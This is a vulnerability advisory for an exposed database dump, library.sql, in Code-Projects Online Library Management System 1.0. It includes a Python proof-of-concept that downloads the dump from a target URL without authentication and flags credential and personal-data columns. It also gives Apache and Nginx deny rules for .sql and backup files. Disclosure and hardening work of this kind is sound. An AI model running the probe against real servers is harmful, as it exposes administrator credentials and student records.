Code-Projects Online Library Management System
cpe:2.3:a:online_library_management_system_project:online_library_management_system:*:*:*:*:*:*:*
- 1.0
A sensitive information disclosure vulnerability has been identified in Code-Projects Online Library Management System version 1.0. The cause is an SQL database backup file, 'library.sql', left in a directory under the web root. Because the web server places no restriction on access to .sql files, any unauthenticated user can download the database dump over plain HTTP. The dump contains the full schema and the application data, including user accounts, student records, issued-book records, and administrative credentials. The vulnerability results from insecure deployment practice and improper server configuration, which leaves this data exposed to anyone who can reach the server.
Exploitation of this vulnerability gives an attacker unauthorized access to sensitive information, including administrator credentials, student and user account data, records of issued books, email addresses, and other personal information. Credentials recovered from the dump can be reused against the application's own login, which can lead to account compromise, unauthorized administrative access, credential reuse against other services, data manipulation or deletion, further compromise of the application, and, in severe cases, full control over the application and its data.
To reproduce this vulnerability, install Code-Projects Online Library Management System in PHP version 1.0 with its default directory layout. From any client, without logging in, request '/Library/sql/library.sql' on the web server (the file sits in the '/Library/sql/' directory). The server returns the dump directly, with no authentication prompt or access check. Opening the downloaded file reveals the schema and data, including administrator credentials and user records. If directory listing is enabled, a request for '/Library/sql/' alone also reveals the file name.
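The reproduction step above, as an added example that is not part of the original advisory or of the Code-Projects code base: the script requests the dump at the path the advisory names from a hypothetical base URL supplied on the command line, checks that the response is a SQL dump rather than an error or login page, and then triages the dump to show which tables carry credential- or PII-looking columns and how many rows each holds. The dump format (mysqldump layout with backtick-quoted identifiers) and the embedded sample dump are assumptions and constructed data, not content taken from the product.

```python
"""Probe for, and triage, an exposed SQL dump such as /Library/sql/library.sql.

Added example for this advisory, not code from Code-Projects or the Online Library
Management System. Assumes a hypothetical base URL given on the command line, the dump
path the advisory names, and a mysqldump-style dump (backtick-quoted identifiers).
"""
import re
import sys
import urllib.error
import urllib.request

DUMP_PATH = "/Library/sql/library.sql"  # path named in the advisory
# Column-name fragments that usually mean credentials or personal data (heuristic only).
SENSITIVE_FRAGMENTS = ("pass", "pwd", "email", "phone", "address", "token")
CREATE_RE = re.compile(r"CREATE TABLE\s+(?:IF NOT EXISTS\s+)?`(\w+)`\s*\((.*?)\)\s*(?:ENGINE=[^;]*)?;", re.I | re.S)
INSERT_RE = re.compile(r"INSERT INTO\s+`?(\w+)`?\s*(?:\([^)]*\)\s*)?VALUES\s*", re.I)


def probe_dump(base_url, timeout=10):
    """Unauthenticated GET of the dump: (http_status, body), or (None, b'') on a network error."""
    req = urllib.request.Request(base_url.rstrip("/") + DUMP_PATH,
                                 headers={"User-Agent": "sql-dump-probe/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, b""
    except (urllib.error.URLError, OSError):
        return None, b""


def is_sql_dump(body):
    """True if the body looks like a SQL dump rather than an HTML error or login page."""
    head = body[:65536].decode("utf-8", "replace")
    return re.search(r"^\s*(CREATE TABLE|INSERT INTO)\b", head, re.I | re.M) is not None


def _scan_values(text, start):
    """Count top-level value tuples from `start` to the statement's ';'; returns (count, end).
    Quotes, backslash escapes and paren depth are tracked, so a '(' or ';' inside a string
    value (a phone number, an address) neither miscounts rows nor ends the statement early."""
    depth, quote, escaped, count = 0, None, False, 0
    for i in range(start, len(text)):
        ch = text[i]
        if quote:
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
        elif ch == "(":
            count += 1 if depth == 0 else 0
            depth += 1
        elif ch == ")":
            depth -= 1
        elif ch == ";" and depth == 0:
            return count, i + 1
    return count, len(text)


def triage_dump(sql_text):
    """Map table name -> {'columns', 'rows', 'sensitive'} for every table in the dump."""
    tables = {}
    for name, body in CREATE_RE.findall(sql_text):
        # Column definitions open a line with a backtick-quoted name; PRIMARY/UNIQUE KEY lines do not.
        cols = re.findall(r"^\s*`(\w+)`\s", body, re.M)
        flagged = [c for c in cols if any(f in c.lower() for f in SENSITIVE_FRAGMENTS)]
        tables[name] = {"columns": cols, "rows": 0, "sensitive": flagged}
    pos = 0
    while (m := INSERT_RE.search(sql_text, pos)):
        rows, pos = _scan_values(sql_text, m.end())
        entry = tables.setdefault(m.group(1), {"columns": [], "rows": 0, "sensitive": []})
        entry["rows"] += rows
    return tables


# Constructed sample in mysqldump layout; placeholder values, not data from the product.
SAMPLE_DUMP = """-- constructed sample, not the real library.sql
CREATE TABLE `admin` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `username` varchar(50) NOT NULL,
  `password` varchar(255) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `admin` (`id`, `username`, `password`) VALUES
(1, 'admin', 'REDACTED_HASH');
CREATE TABLE `student` (
  `id` int(11) NOT NULL,
  `name` varchar(100) DEFAULT NULL,
  `email` varchar(100) DEFAULT NULL,
  `phone` varchar(20) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `student` VALUES
(1, 'Alice Example', 'alice@example.com', '(555) 010-0001'),
(2, 'Bob Example', 'bob@example.com', '(555) 010-0002; ext 7');
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:  # python3 probe_dump.py http://target.example
        status, body = probe_dump(sys.argv[1])
        if not (status == 200 and is_sql_dump(body)):
            sys.exit(f"{DUMP_PATH}: status={status}, not an exposed SQL dump")
        text = body.decode("utf-8", "replace")
    else:
        text = SAMPLE_DUMP  # offline demo on the constructed sample
    for name, info in triage_dump(text).items():
        print(("SENSITIVE " if info["sensitive"] else "") + f"{name}: {info}")
```

Run it with no argument to see the triage on the constructed sample; with a base URL it performs the single unauthenticated GET the advisory describes and only triages the body when the server answered 200 with SQL content, so an HTML 404 or login redirect is not mistaken for an exposed dump. The value scanner exists because naive row counting on `(` or splitting on `;` breaks on phone numbers and addresses, which are exactly the fields a dump like this contains.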
It is recommended to remove SQL backup files from the web root and keep them in a location the web server cannot serve. Independently of that, access to .sql files should be denied through server configuration, such as Apache or Nginx rules, so that a dump left behind by a future deployment is still not downloadable. Directory listing should be disabled, strict file permissions applied, and deployments audited regularly for stray dump, backup, and archive files.
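The server-side rules described above, as an added hardening example that is not configuration shipped with Code-Projects Online Library Management System. The DocumentRoot path is an assumption; the '/Library/sql/' directory and the .sql extension come from the advisory, and the additional backup extensions generalise the same rule to other artefacts that end up under web roots.

```apache
# Added hardening example for this advisory; not configuration shipped with
# Code-Projects Online Library Management System. The DocumentRoot path below is
# an assumption; the /Library/sql/ directory and the .sql extension come from the
# advisory, the other extensions are a generalisation of the same rule.
# Apache 2.4 syntax; on 2.2 use "Order deny,allow" / "Deny from all" instead.

<Directory "/var/www/html/Library">
    # Never list directory contents, so a request for /Library/sql/ reveals no file names
    Options -Indexes
    AllowOverride None
</Directory>

# The dump directory should not exist under the web root at all; until it is moved,
# make it unreachable over HTTP.
<Directory "/var/www/html/Library/sql">
    Require all denied
</Directory>

# Refuse to serve dumps and backup artefacts anywhere under the root, whatever
# directory a later deployment drops them in.
<FilesMatch "\.(sql|sql\.gz|bak|old|zip)$">
    Require all denied
</FilesMatch>
```

After reloading Apache, `curl -I http://host/Library/sql/library.sql` should return 403 (or 404 once the file has actually been removed), not 200. The `<Directory>` blocks belong in the server configuration; in a `.htaccess` file only the `FilesMatch` rule and `Options -Indexes` apply, and only where `AllowOverride` permits them. The Nginx equivalent is `location ~* \.(sql|sql\.gz|bak|old|zip)$ { deny all; }` together with `location ^~ /Library/sql/ { deny all; }`; `autoindex` is off by default in Nginx and should stay off.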